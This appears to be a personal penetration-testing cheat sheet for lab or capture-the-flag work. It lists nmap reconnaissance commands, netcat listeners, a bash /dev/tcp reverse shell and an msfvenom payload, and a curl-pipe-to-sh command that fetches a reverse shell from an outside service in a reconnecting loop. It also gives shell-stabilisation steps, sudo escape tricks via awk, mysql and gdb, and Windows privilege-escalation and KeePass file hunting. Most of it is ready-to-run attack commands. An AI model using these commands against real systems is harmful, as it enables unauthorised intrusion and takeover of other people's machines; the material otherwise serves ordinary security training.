to install:
- magic-wormhole
- tldr (the tealdeer package provides the tldr client)
- rlwrap
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
Kali keyring: if apt fails with a keyring or signature error, refresh the archive keyring:
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
information gathering
nmap
quick ping sweep to find live hosts in a /24:
nmap -sn ip/24
to keep only the IPs of the hosts that answered (field 5 of the "Nmap scan report for ..." lines):
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports: the inner nmap lists every open port (-p-), the pipeline turns them into a comma-separated list, and the outer nmap runs default scripts, version detection and -A only against those ports:
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
dirb
dirb http://ip
on Windows targets:
nmap --script vuln ip
on Windows targets with SMB (quote the pattern so the shell does not expand it):
nmap --script "smb-vuln*" ip
initial access
start listener:
rlwrap -cAr nc -nlvp 9002
reverse shell bash:
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
reverse shell file:
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-> from revshells.com
untested:
Reverse Shell as a Service
On your machine:
nc -l 1337 (or nc -nlvp 1337 as in the listener above; untested)
On the target machine:
curl https://reverse-shell.sh/yourip:1337 | sh
reconnecting (loops the fetch so the shell comes back after it drops):
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
privilege escalation
always run these:
sudo -l
if sudo doesn't work: see 3.2 below
check cronjobs:
ls /etc/cron.*
crontab -l
TTY Spawn Shell
if sudo still doesn't work, use sudo -S (reads the password from stdin):
sudo -S command
Often during pen tests you may obtain a shell without having a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
Python spawn shell
python -c 'import pty; pty.spawn("/bin/bash")'
Fully Interactive TTY
All the steps to stabilize your shell
The first step:
python3 -c 'import pty;pty.spawn("/bin/bash")'
which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys.
Step two is:
export TERM=xterm
This will give us access to term commands such as clear.
Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use
stty raw -echo; fg
This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, fg brings the remote shell back to the foreground.
stty rows 38 columns 116
(set rows and columns to your own terminal's size, as reported by stty size in a local terminal)
OS system spawn shell (from an interactive Python prompt)
import os; os.system("/bin/bash")
Bash spawn shell
/bin/sh -i
Perl spawn shell
perl -e 'exec "/bin/sh";'
Ruby spawn shell
ruby -e 'exec "/bin/sh"'
Lua spawn shell
lua -e 'os.execute("/bin/sh")'
IRB spawn shell (inside irb)
exec "/bin/sh"
VI spawn shell
:!bash
VI(2) spawn shell
:set shell=/bin/bash
:shell
Nmap spawn shell (only in old nmap versions that still offer --interactive)
!sh
Exiftool
read metadata:
exiftool picture.png
Binwalk (extract embedded binary data):
binwalk -e picture.png
Windows
WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
LOLBAS
https://lolbas-project.github.io/#
WADCOMS
PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
RUN these while the other scripts are working
whoami /priv
whoami /all
schtasks /query
for finding KeePass .kdbx files:
https://github.com/ivanmrsulja/keepass2john
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
evil-winrm
quick wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '\! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'